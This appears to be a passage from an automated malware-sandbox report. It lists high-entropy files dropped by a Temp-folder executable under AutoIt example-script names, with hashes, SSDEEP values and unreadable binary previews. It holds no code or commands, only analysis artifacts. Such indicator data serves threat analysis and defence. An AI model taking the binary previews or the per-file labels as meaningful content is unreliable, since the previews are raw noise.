                                                                                                                                                                                                                                                Preview:..V..4...y.ZD.s.../&...V.^]Av......6....W.3..:.SFh.9U....H.f.....)/..C.....K?.+N.,..b.hJQycN...$.....2F..qxe..=...j..H0....T....i.?Ar.........6d..Q....o6Z..RP.A.....dW...T.v...L..Q.`.*...)..$......YT..2.-7.).5..1..[.......s.~...3.m.9..1v/.4.gx.I....T.CYp@.i9I..........`C......I..4.\.....x]!.-e.;.+.....U:.uSm...V~..S...@M.c.q..W.S....a..Z.I..u..Gd...n..5.C..~.....\~..X..$n..wG.....U.D.Z....N.....v=.H.kYwB.0.gm\..z............q.Zo.5..t.A....k......~.!......?..L..!x@....C...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinSetTrans.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1048
                                                                                                                                                                                                                                                Entropy (8bit):7.781289831189132
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:wsfXdOI9k3k5T+fmPuNlWfkjmJrc0YXUZtwsTIAksC:RF9k05TCIuB4o0jZtwZAkn
                                                                                                                                                                                                                                                MD5:38FE17068682792E13A99EF4CE367903
                                                                                                                                                                                                                                                SHA1:54D9DCB9CB89C841243E752747494B887D90EAB1
                                                                                                                                                                                                                                                SHA-256:C266F0B497F1977D789372F90A59CC740279F29BEA38C9C7BCB158FE202AAA82
                                                                                                                                                                                                                                                SHA-512:ACD986E47AB52749C65041CB2B29F8254845303286CF224319A3AFD3CACC958239A71FAD29A485D7DF70A069275C86674705758A37FF4B12D58D7FA843F253B7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.U]..r...\.f!&.W......u.....{.V"L....h7.......Kq..,d'..*..Z.......X.S\....!.b.../...^T..J.~(....(V ..&.0........u....,....+.2"....Y.K.(:lK..*s.<..f.D6.N.o....1+N..s.......[....L..\.......S..\..].#..f^T.2..+E}...w.....`x.......&..N..F....AU~.....kh..O.v(..2.......4...1.S.m5.....K.p...l..:.T.42.PX.M/.....9...H#Mh4....v..Os...~3s.(.K$u.?..G8.p.*...k..w..8..(...;....k_...A.;...u....K.N[...5Yl]8w...(........Q...T..q.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.W@...2@JD.Y.5Dv.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinWait.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):953
                                                                                                                                                                                                                                                Entropy (8bit):7.767263035019047
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:qvE3uF69f4tfWl9wGO+S7vDXsnxO5rWKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJ0:FMmFOb7rXjNWKjmJrc0YXUZtwsT6tp
                                                                                                                                                                                                                                                MD5:D46D6FEBDAA1ABA2C2E4268C90259421
                                                                                                                                                                                                                                                SHA1:19330EBEC544E1EC6FAA4F47BDB0215F6E56895D
                                                                                                                                                                                                                                                SHA-256:548C95EC29015BB588E9F0F51ED1BD56046E5982A42D91A185A5F28EA1D5A12F
                                                                                                                                                                                                                                                SHA-512:C84C08C0E1E045F0171F68DA26B049C1EC6F17626367C9D94ADC48981BB47B1D94CC45A61C990E0879917277C4A0766D3AAD31EB3C5565B4FC6BB77B3625892A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.."4\.n.F.?..C....#........&^c.d.b4..$.ik.F....0$;H....z.Y.K...t..2.=.=.7(....6M.(..[9}..'...y.Y.*.,DL$u.lp....?G=.....]g.$..P.8.*.e....i....?da...8).4E..e.n.....$..WL..1...+.LZ.......ju.....J...^.a..X...k.<.7..5..$...+.M.+..6......H..l .n.U..w..?.1..).1.H....F...Gd|t...F.....f.....0Bf.E......dNe.C.D...^.s.....Q....v...\^M.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...V*..?.TtR....y...|]..:.Sc.h..v..].Y...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinWaitActive.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                Entropy (8bit):7.749250855972071
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:MWY94gTFT8fLSeJQh79jmJrc0YXUZtwsT6Y:X88WeJ67F4o0jZtwO
                                                                                                                                                                                                                                                MD5:3907A5E7861845807C032DD1F54170C8
                                                                                                                                                                                                                                                SHA1:D1889247D022AD1918E8E9A0D24E571D858FA158
                                                                                                                                                                                                                                                SHA-256:3B692202253E43CF03C43FAA72F91858979C71352987834D834E621C3C611379
                                                                                                                                                                                                                                                SHA-512:1E2557BE5F3EDF8B7FFB95362CA4A9871EA7475E65718A5CF15F5A4ADD4EE89F2F9766899521792FA930239B41F7A7ADD3795CCBDF2D44278DD9237ADE11DEB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:A..6X}cYa.0\..r...nkP.......ma..6U...*r.."g~'...J..f...3.q.l..$..!0.q......Uj..[.Nd....q.tW..s.5R.(.Z.h................yg.m.L.<G.9..m.B...0...n..v..Q...K........M..<X...O...B-...91O...w........W.9......*ZU....]=.k...,d..h\..J.....T..1....]!.j.s..%Q)k.....O....l~.OLzI...r.%..r..h...XW.....E.".HV'...X.........b.2'u.0m}G.....>0.i..-.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....;....n..nM..R...4....T....%.B.#_...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinWaitClose.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):805
                                                                                                                                                                                                                                                Entropy (8bit):7.7205880828007265
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:LulbWNpnv7PCX/iIyjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZk+:albWTnvDqi1jmJrc0YXUZtwsTus
                                                                                                                                                                                                                                                MD5:36F959620665ED2F002E602E87BDB554
                                                                                                                                                                                                                                                SHA1:FDC769BB81CFFC5F93F41F7BB1148D07D620D114
                                                                                                                                                                                                                                                SHA-256:D169FB8A685E924A5D608B17DAF5A36F646A6E73316A66822B4D7B752CC8CD2C
                                                                                                                                                                                                                                                SHA-512:87BAF2794A611D979E6765B5DA44C3533609C9CF5B67665F8F797F2E99F0601A6E3A0082CB3EF97AB8FB8E60F7F26DCAA6CF0527E16D5A1462083B7FA26775F5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:]...8....xpv.!.5...p*...FH..A.........,.*.....M.z...N..J.K.M....Qa+.sr......J......:.z..8I.Sg..}1..|.&Q;<....Q.._I...+..7.:.A.Q.....?Zy....}..!..L.....t...8.w.V%.....,....D.'......-.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....-.s.Lqes.7...@J-3s...Z...CSQ.@(....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\WinWaitNotActive.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):821
                                                                                                                                                                                                                                                Entropy (8bit):7.721524685435987
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:mx4eblwMq6fDQ2YjntfjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXC:mSeblwnAU2YTljmJrc0YXUZtwsT3Pi7
                                                                                                                                                                                                                                                MD5:1000C8C0AB31D5294A5A75857378871A
                                                                                                                                                                                                                                                SHA1:2DAA7CA7FF7DE4D4BD29DDD43946DB73C0BB7B69
                                                                                                                                                                                                                                                SHA-256:EDC58C18015F48FB42CEB28F7D38894E5E9040ECF63D20E4B786EB26AD709360
                                                                                                                                                                                                                                                SHA-512:9FCBA36B1436DA4F8D81ED477922776E4899E5B92A958787AD7CCBBFB25EB1D722C72D02C306BF09F465E3BB64F85C398B5928B6C7838E0912AD9DC4EBADF83B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:\.o~!.MhLvH.B:c.L.j7...%Q.:.D.ctP..k...f.,3.A..{.K......Gd.~/ ........el.jG..QU6.$...3..):.o.R../I..=JO../E]......e.G".1..X`.j.....J.._ M@....,.z..D*.P...8r.#,/....L.E\....Q]..6......k...D.b.W..w.i..kPH&..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..7.Y`kcH..uS.#..y.(....>.^..D..5........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\With.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):802
                                                                                                                                                                                                                                                Entropy (8bit):7.693762487470381
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:SUFqXTklptFgj2GgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZUva:SUYjkljFgjhgjmJrc0YXUZtwsT4va
                                                                                                                                                                                                                                                MD5:783D14CB16B83A2E7AE4A01EFB8F1142
                                                                                                                                                                                                                                                SHA1:72F61D1550AB2FEA299EF1CF577339CE417119E8
                                                                                                                                                                                                                                                SHA-256:E29536C12F08BA33DA0FD50CFC8AB016998BBF6A72BC9EB8396C0DF9045C3978
                                                                                                                                                                                                                                                SHA-512:E535FEA7E05C4E3048CB50A3B44C10E77659A4E0459EF398CC59350C3D220A08E15CE9C0B71CE509EB189A0C451D210A12D0B33E6F4403894BD9E637C4A45FF0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.6..`.d.Y.4...ea...VJ.b.<.|Gv.s._.%]Km....f......T(.%....&sf.'.)t..f-.x..0....*......+tp!...Z}.5W..ZD.....D.t8~j.D..Z..N#....k...|.....J...T...yX........&..y..%e.U..@.B.;.q.ro.S...P..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.L...4U...@..4.J......j.0P..VJ......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Array1DToHistogram.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):797
                                                                                                                                                                                                                                                Entropy (8bit):7.7091618505410064
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:cmgvh2Chhczxry+zL+jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZI:cf52Chhczxry6+jmJrc0YXUZtwsTc
                                                                                                                                                                                                                                                MD5:CE18B743FE42A1EB91588C2F613791BB
                                                                                                                                                                                                                                                SHA1:4D6E1A2F2FA01E01719CABE1E437F80995714614
                                                                                                                                                                                                                                                SHA-256:BC487DB318E0524FBFA92DD4856060F9B40429AAD67FFE047E48D8BBE46F4386
                                                                                                                                                                                                                                                SHA-512:E45279F3123D8DA95A643BBFFE470EB6F7015C1D7CD9DB0071BF29354378C14B79DCB35C41292CEECA0D904A1C5DC61D95C43BF4FF62C10263E6B94A20EA4033
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:U....m.... ....y.&...."i-.\.w..@....B.............OcZK...n.jc0b..............Yh..'.A...U!._y..f..~._..bb...z.j.-.c....u.\..i.T..0F.8...8\.YWI....[B.3.8]..3.#.Xwy.....6G..;.........8.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.`W...f...Ry.g7.x.-.,...."&W!..Y."D.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Array1DToHistogram[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):900
                                                                                                                                                                                                                                                Entropy (8bit):7.761841902968861
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:/jEJhWM6yv1VKNj5c92jmJrc0YXUZtwsTvBL4:/Uht6q1g9gI4o0jZtw+L4
                                                                                                                                                                                                                                                MD5:446E56B79A23B7F02769D9C1696AE604
                                                                                                                                                                                                                                                SHA1:1B76748B9C5B963954354AA4F6DD78B70A881375
                                                                                                                                                                                                                                                SHA-256:81AB6859FD09E0A179B1E82C63CF9D2E7948655BCECB4FFDB40B8866F6ACCE2C
                                                                                                                                                                                                                                                SHA-512:9439C7B285CF10A046BEA78CAF3FD6F778BF6E2238292D3A1CB4CA0274D750D36E72A6857A1BE8D8CCF4638CAB2907CDCF11A08683D43BE7225C37B82985F482
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..b6........Q.q......|.!......12...-....-..D>.N.b...A.....7:aS.nt.RHsX..V...V3...9.8'#..,,.U..2.YU@2F.3<....pM.,k/..G.uh.F..d..R.R...?...%...,..w..c...HW(...I.<_......<.b....>NGj...5.E.{.X......J.)".^z.H..dB..Z..{..(.......>.....P..CGO..R..(..1Xl....w..O....rMtk2}...V...V..]O|.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.5....R..4..n.g....o..J....f.B...8d.$...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Array2DCreate.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                                                                                Entropy (8bit):7.712724133668209
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:ml8PMC8cWgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZc3+LpOfHn:mSYLgjmJrc0YXUZtwsTnLpO/
                                                                                                                                                                                                                                                MD5:291D120CCB580AA56527F851F0DD56FC
                                                                                                                                                                                                                                                SHA1:0DC28B18A1A7DE717B66565442D1AD4194C0BEE0
                                                                                                                                                                                                                                                SHA-256:9123FC0932B3684A10C0B738BABDBD5448B3956295B0811AD776C53E8809ADEC
                                                                                                                                                                                                                                                SHA-512:3696D87B772C7E9F6FC35F1E8A139CDFD7547FE39EE0AE0D72C769741D6E3E322639A91C5F539479CB80B3851DDD118E75191DBD0A7F51464896244E04E54754
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..86...,6wO...d.....i.....x.KO#e.o<..u..V{.?X.[....f..l..)u.RxG..\.&6va.}.....@..]$s.2.Yu..$...Z?..;.Q<..J.q..t.6.....c.`.F..`......b..S}..Q1...@.h..%....%...... .X7.26.G7...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....k.I...1..R.....+.K......?z.l=.-.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Array2DCreate[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1984
                                                                                                                                                                                                                                                Entropy (8bit):7.891584662621897
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:mP/s2AtxGanSn+4x1GSp95vQ/F9+1bQ0O4o0jZtwom:4TAzhIxB9pQT+Hleom
                                                                                                                                                                                                                                                MD5:D074859D2A8A95DA9554F68555D7593B
                                                                                                                                                                                                                                                SHA1:C574276FA2360F8CA24E3BA1AD0A6A7090CA7ACF
                                                                                                                                                                                                                                                SHA-256:4209BE2CF35F4E756C445D968DE48EDED7B25D785A92862DC251A0F66A628FF1
                                                                                                                                                                                                                                                SHA-512:3DEE9FC95FD94E28CF26913F11CF17A0773096ADB5F3134E36EC1E55200D54B7B3F5D2ABE4578B6AAE2BFC90B5AA690E128E63D3D2D0675737216BACAEB7EB9D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.~%.9.e3..v..u..2.c.um}C.1E...(....i.D....lQ}..be...."^..r-..$....t..b......b>..J...!..#.wQ....X.2q.Mm.0......&........X..,.L....X...~H..w..S9v...o..s\.G<.$...!_...7c..K *..mt....7r...4:........#.....n.on!>..{..HV.kM......]..".8W..~..z..xK.)W.4....xhg.0....(Z.>14..........ia<.... .._.g...:.. ...0e...P.2._..|..k.........;,.....hv..;ky...|p%.O.m?.R3&C)...&...K.n`..K.u.<....]./.......F.u3.=.P._\........T.[.u3`.L..N..C.).].s.jF...Yu.M...-..C.5..,...Q.hm.{...B.RF.9..RU?X8m.Q.....PQ...m.`7..C#+f..8.>J........_.....2.}..Dbq.7U.C..+...5.......z.....<.p.6..,.%..a..g...UV........R..+...L.{jy."q,.......q...E...".....2".Y......{.N..6.Pfk%(.kk......<.l.wie-j.<J......d..((....G........!...Q.%.?f..:pN.bR............$%....C......Ow&3..%..__..."\.7..{D..J7..G..;.'.............$....D.76=.!.$HW.VQ..jRn.....Rw.+..q.d.u.....M.,.{...z.3.qW.M..mk#.y~..E....pI...v$./R.......N..............2..M...=)...;.^B>......d.|8..l ..!.$.d......qm/.$......1....R

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayAdd.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1519
                                                                                                                                                                                                                                                Entropy (8bit):7.8707819819361475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:I3KKA+fii3HB9GlWrR8s6Pj1xediLatF4XlyNVokzpy1LU3tZVxejmJrc0YXUZtZ:I3M+HGAbU1tatFOkVokzpco3tZXQ4o0t
                                                                                                                                                                                                                                                MD5:ACC281CEE1EB3E3B32D93743DFCD0E4D
                                                                                                                                                                                                                                                SHA1:82C16AA3055DB5F33FEAD0A13EFCA08F6BAE18DE
                                                                                                                                                                                                                                                SHA-256:CB883342780876EB6B73B43B04BE81465387CFF0A294505847C98473ABB68689
                                                                                                                                                                                                                                                SHA-512:CA5B43A3D827E604CF8C6BFA094A229FE75CDFE7D4C1A0845CB14E527C70D3052F689F03216305BE01F87D264C2E5DDFF888D1FDAFEBCFA2A8BA76D9AEC851C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...(..\oc...).(I.6...E..x.`.~..../..(.G.Y.O1..../cE..i2....~-.e2.w.gi8.'...6.j.....,.q2..!..@d.G[l..W.K...J...X.\).`.G...vY...=JQ^.rmL.MT7.8...n.+W.*U..lZ..`....E..z^.W..p....M1.....|....%f@r<.J....1.o....|.bJ.K../.wW.u..Z......g.F...`[1yN.......G.BF. #..9z...P..S^H"%..5f..u...q.......rW/.RD%H.....7<.<v.ifc.SP...i#.....%uF..u#.....).b.rY.....o.w-..yCj..[0.%.%d....^.*..04.bd...)-<c!T4. z..%..2..g..\:...;Q....L5........$5..UsR../..IL|........G.....VD(.....P,.q_..j...!.......q....v.../.p.....I.1.....s).9.....m0K..\..wu.....y.....#.Sn..^M.!2..<m.F.v_.0.y...GJ'.;.!h.c.X.)G.W.9..ow........X&...#.\....Y.<.f-..o'..x......Dy[....Y..y*~..<MB.z....$...`...$.......w#...../..MR...PY.R..bo3.v-....a.q./. lD..:..c...L.Z.&...t+]..cF..5h\6.]Q..U0.:N.7.Y.Kd...2.-.t...\..8M.3.V...B[.zJ3B.[....3utT.)e.].(I>.NA.3.%..dP.8.I.MI...2.W#.xK..L...e.e....."..P./.i..C....P.Z..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayAdd[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1821
                                                                                                                                                                                                                                                Entropy (8bit):7.8941546900419945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:atfEmaH9zIp+MxyeBY5D3eruH3dL4Tg6+lH4o0jZtwoPs:GKzIpbPG3PLct+6leo0
                                                                                                                                                                                                                                                MD5:D83E5953A5F948FF971BE4E871B958FC
                                                                                                                                                                                                                                                SHA1:EDF00539B6355C53C5EC9802C2898215FAE07329
                                                                                                                                                                                                                                                SHA-256:37105AF20675CA937F1A579C77047AACE0CC2000CC987B6EAEA2974ED3914B84
                                                                                                                                                                                                                                                SHA-512:9A4F6E70FEBF325ADDA50E82EEF4FC17DC55E0C53F8AE7712B5248DE278A029BDC408D55B29FF4B0D046D1115E38852B5F9DD9CD70ED79A0C120991376F4FABD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
